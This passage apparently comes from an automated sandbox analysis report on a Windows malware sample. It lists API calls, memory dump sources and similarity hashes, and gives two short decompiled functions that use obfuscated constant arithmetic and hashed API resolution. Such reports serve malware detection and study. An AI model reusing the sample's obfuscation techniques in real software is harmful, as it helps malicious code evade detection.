                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F20191E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2659868963-0
                                                                                                                                                                                                                    • Opcode ID: 7cc8f98925944707bcf25a2ed1fc88e594d4b782da87a8b7b54f60c6e1b66357
                                                                                                                                                                                                                    • Instruction ID: 538de52f48498a806b76c2f3ab896b6305086022d2d583437b5134e4846c9546
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cc8f98925944707bcf25a2ed1fc88e594d4b782da87a8b7b54f60c6e1b66357
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F012B7A81430EA7CB14DBA9DC4098977DCBE022687104636F61C9B880EB70F5948E98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F2287B0,00000001,00000364,00000006,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000), ref: 6F22B030
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                    • Opcode ID: 38deea77e4ba52cfd4cb4f29c1e104f6259383b0446057519d18fb7e0dbf489c
                                                                                                                                                                                                                    • Instruction ID: ea84580cc862cad5171445bf7c44527865bce3842283334bf8ee5eaf1ec77c30
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38deea77e4ba52cfd4cb4f29c1e104f6259383b0446057519d18fb7e0dbf489c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0E03295572EA6DB335F358C08B6B37D9AF42771B108112AC34DA580CB60F5148FA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22FA54
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 314386986-0
                                                                                                                                                                                                                    • Opcode ID: 5495dc858c2a722f0d40bc960d000315ce94b3ea6e102d8e88f4ad12e0f1361e
                                                                                                                                                                                                                    • Instruction ID: a59ba97aa52d84e019c0c8e8dffdd67233d6b6ac4d648f654d9697e9db1ea8f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5495dc858c2a722f0d40bc960d000315ce94b3ea6e102d8e88f4ad12e0f1361e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F06DB2109704CFE724DF14D941B43B7F8EB04725F10882ED69A9BA91DBB4B944CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                    • Opcode ID: 000600fa7b23652ced4414c7d2b1813f7b17d8de307d7d9db1faaaf93c789126
                                                                                                                                                                                                                    • Instruction ID: f558db51c2a886fd7a4c713cb2c104740b3893cb96e0845969239d62bd99fce6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 000600fa7b23652ced4414c7d2b1813f7b17d8de307d7d9db1faaaf93c789126
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3E02B3254C73F67EB111A758D08B9B37C9EF033B2F110115BC28969C0DB20E9008DB8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E02FD6D52() {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v12 = 0x201161;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xb36a;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x00247f79;
                                                                                                                                                                                                                    				_v8 = 0x239e7a;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf99c9d58;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xf9b97f3c;
                                                                                                                                                                                                                    				E02FDE554(0xa45f1f5c, 0xab0622b6, 0x50);
                                                                                                                                                                                                                    				ExitProcess(0);
                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                    0x02fd6d57
                                                                                                                                                                                                                    0x02fd6d5e
                                                                                                                                                                                                                    0x02fd6d65
                                                                                                                                                                                                                    0x02fd6d6c
                                                                                                                                                                                                                    0x02fd6d73
                                                                                                                                                                                                                    0x02fd6d7a
                                                                                                                                                                                                                    0x02fd6d94
                                                                                                                                                                                                                    0x02fd6d9e

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 02FD6D9E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809479774.0000000002FC0000.00000040.00000010.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                    • Opcode ID: a122b493867602417b930f0a9de268a3edaec180e64286864dbfbe39b7f241e0
                                                                                                                                                                                                                    • Instruction ID: 4909cead13cb24d53399a8648f3d7b94c50c797fcc9f12aafd093ecadd142f55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a122b493867602417b930f0a9de268a3edaec180e64286864dbfbe39b7f241e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFE039B0921308BBDB48CBD59D46B9EBBB4AB00345F204088E609B6290E7B11B549A62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                    			E02FC6877(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                    				WCHAR* _t40;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E02FDC6D8(_t24);
                                                                                                                                                                                                                    				_v12 = 0xf4ca38;
                                                                                                                                                                                                                    				_v12 = _v12 >> 0xd;
                                                                                                                                                                                                                    				_t34 = 5;
                                                                                                                                                                                                                    				_v12 = _v12 / _t34;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0006577f;
                                                                                                                                                                                                                    				_v8 = 0xa9d358;
                                                                                                                                                                                                                    				_v8 = _v8 | 0xbfd8fadd;
                                                                                                                                                                                                                    				_v8 = _v8 * 0x27;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x3f164cd7;
                                                                                                                                                                                                                    				E02FDE554(0xa45f1f5c, 0x9f092728, 0x18e);
                                                                                                                                                                                                                    				_t32 = lstrcmpiW(_t40, _a8); // executed
                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                    0x02fc687d
                                                                                                                                                                                                                    0x02fc6880
                                                                                                                                                                                                                    0x02fc6882
                                                                                                                                                                                                                    0x02fc6885
                                                                                                                                                                                                                    0x02fc6887
                                                                                                                                                                                                                    0x02fc688c
                                                                                                                                                                                                                    0x02fc6895
                                                                                                                                                                                                                    0x02fc689e
                                                                                                                                                                                                                    0x02fc68a9
                                                                                                                                                                                                                    0x02fc68ac
                                                                                                                                                                                                                    0x02fc68b3
                                                                                                                                                                                                                    0x02fc68ba
                                                                                                                                                                                                                    0x02fc68cf
                                                                                                                                                                                                                    0x02fc68d2
                                                                                                                                                                                                                    0x02fc68df
                                                                                                                                                                                                                    0x02fc68eb
                                                                                                                                                                                                                    0x02fc68f1

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrcmpiW.KERNELBASE(?,?), ref: 02FC68EB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809479774.0000000002FC0000.00000040.00000010.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                                                                                                    • Opcode ID: 3dd7cf760ab25b67abe97c2f97cbaf0e2bbca96cc917130f8850b1ae82fa3993
                                                                                                                                                                                                                    • Instruction ID: 164a6009b32816bbe7574c05c86bc542f076494444bba94fd6015f53dd45c0dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dd7cf760ab25b67abe97c2f97cbaf0e2bbca96cc917130f8850b1ae82fa3993
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4201463690220CFBDB08DF90DD468DEBFBAEB45354F208199E918AB210D7715B60EB91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoTaskMemAlloc.OLE32(6F20DE18,A9775A74,00000000,00000000), ref: 6F20E6F8
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,A9775A74,00000000,00000000), ref: 6F20E724
                                                                                                                                                                                                                    • CharNextW.USER32(?,00000000), ref: 6F20E789
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E78E
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E793
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E798
                                                                                                                                                                                                                    • CharNextW.USER32(?), ref: 6F20E7E0
                                                                                                                                                                                                                    • CharNextW.USER32 ref: 6F20E7F0
                                                                                                                                                                                                                    • CharNextW.USER32(00000000,A9775A74,00000000,00000000), ref: 6F20E86A
                                                                                                                                                                                                                    • CharNextW.USER32 ref: 6F20E893
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E8C7
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 6F20E8DD
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 6F20E92C
                                                                                                                                                                                                                    • CharNextW.USER32 ref: 6F20E9B2
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 6F20E9E3
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,A9775A74,00000000,00000000), ref: 6F20EA01
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,6F244C8C,?,00000000,C000008C,00000000,00000000), ref: 6F20EABD
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6F20EADC
                                                                                                                                                                                                                    • CharNextW.USER32(?,?,00000000,00000000,00000000,?), ref: 6F20EBA1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext$Task$Free$lstrcmpi$Alloc
                                                                                                                                                                                                                    • String ID: }}$HKCR$HKCU{Software{Classes
                                                                                                                                                                                                                    • API String ID: 2337762536-1142484189
                                                                                                                                                                                                                    • Opcode ID: fe183cd3a9c6cc6ddead4a16444d956ee498839706a3f48514a31a32d454cc45
                                                                                                                                                                                                                    • Instruction ID: 6f9929285aba509965fca10582bf0be2a4a72df6d6fa9fe9a17188374f8866f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe183cd3a9c6cc6ddead4a16444d956ee498839706a3f48514a31a32d454cc45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF1C472904B1DDBDF15AFA8C894B9EBBB5BF46310F1001A9E805EF294DB70A884CF51
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(6F200000,?,00000104), ref: 6F212E0C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6F213076
                                                                                                                                                                                                                      • Part of subcall function 6F207AE0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6F207AED
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Module$ExceptionFileHandleNameRaise
                                                                                                                                                                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                                                    • API String ID: 1728487212-549000027
                                                                                                                                                                                                                    • Opcode ID: 68d368bdc4b3cfde7adfc8bdbbacf194cf87c2e9bb0ae6238ffb9ec6577ccaa1
                                                                                                                                                                                                                    • Instruction ID: a4e91f19591544ec9bcff96f3fb1d74e92bb84e997d485970708a8ff878eff9c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d368bdc4b3cfde7adfc8bdbbacf194cf87c2e9bb0ae6238ffb9ec6577ccaa1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E193B5A0471D87EF28DB54DC51B9A73F5BF46305F0000A99A0EA7A80EB75EE84CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000C,6F217170,00000000,?,6F217308,00000000), ref: 6F217256
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000), ref: 6F21727D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 6F217284
                                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(00000000), ref: 6F217291
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F2172A6
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 6F2172AD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1475849761-0
                                                                                                                                                                                                                    • Opcode ID: 5c39d03928e971136c121a444831428dbb981b2f5ad5004030c3bc46bf83d4f7
                                                                                                                                                                                                                    • Instruction ID: c314f613ac796fc2177e1c4bd898f5a350eff8575f76772527f7a992bb257078
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c39d03928e971136c121a444831428dbb981b2f5ad5004030c3bc46bf83d4f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF0A472644A029BDB209F38C80CB4637FAAF87B22F100029FE81E3644DF709465CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6F234436,?,00000000), ref: 6F2341A9
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6F234436,?,00000000), ref: 6F2341D2
                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,6F234436,?,00000000), ref: 6F2341E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                    • Opcode ID: 1e388f84bbc0d7cfa82dcfe00d61ee9880b4a351a4ba28152079b9e691a4d9d2
                                                                                                                                                                                                                    • Instruction ID: 1a90f8d76d7d975ba82e50b37baddd06ba51bbd3b5d74abbb248abce9089dbdd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e388f84bbc0d7cfa82dcfe00d61ee9880b4a351a4ba28152079b9e691a4d9d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921D3E7E4492EA6D7248B288900AC777B6BF65F65B024594E899CB100E733EE40CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,6F229A39,?,?,?,?,?,?,00000004), ref: 6F233A7B
                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F229A39,?,?,?,?,?,?,00000004), ref: 6F233A8D
                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 6F233B1D
                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 6F233B2B
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6F229A39,00000000,6F229B59), ref: 6F233BCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4147378913-0
                                                                                                                                                                                                                    • Opcode ID: 513953d7b3f3bc410f77cd834d621ca9897c2a33b7cc60835cfdb4adbf45e5ec
                                                                                                                                                                                                                    • Instruction ID: 61a57e4583a18fc60006c0551704c8a9f1d97640fad21429679b0921d787cafa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 513953d7b3f3bc410f77cd834d621ca9897c2a33b7cc60835cfdb4adbf45e5ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE71F4F3E0472EAAE7149B34CC42AAA77A8FF05715F10052AE955DB580EB30EE40CF65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F2286B4
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6F2343F7
                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 6F234452
                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 6F234461
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,6F229A32,00000040,?,6F229B52,00000055,00000000,?,?,00000055,00000000), ref: 6F2344A9
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,6F229AB2,00000040), ref: 6F2344C8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1213562535-0
                                                                                                                                                                                                                    • Opcode ID: 59926dd3dd17482fc9d5a7e6b5669cd6ab495db3ac2776e9bdb00177968dea92
                                                                                                                                                                                                                    • Instruction ID: a9b7c04bbe585ad283d0f00d8020b4531ea21e31d4ba13c104ef825fa827bb63
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59926dd3dd17482fc9d5a7e6b5669cd6ab495db3ac2776e9bdb00177968dea92
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63517EF3D0062E9BEB10DBA4C844AEEB7B8BF05705F1145A6E910EB190E775AA148F61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -$#o$-$#o
                                                                                                                                                                                                                    • API String ID: 0-3582302411
                                                                                                                                                                                                                    • Opcode ID: bda20401a7e75538d1b8e0db93edcee4d9660ed28ec4ba96a57bb920da6a2960
                                                                                                                                                                                                                    • Instruction ID: 240c53b33a1c3b6774f64aec3926cdaef573e81ecda7fab0a29b0ef8ffb1b219
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bda20401a7e75538d1b8e0db93edcee4d9660ed28ec4ba96a57bb920da6a2960
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12022D71E0021D9FDB14CFA9C990A9DB7F5FF48314F15826AD929AB384D731AA41CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F214D93
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6F214E5F
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F214E7F
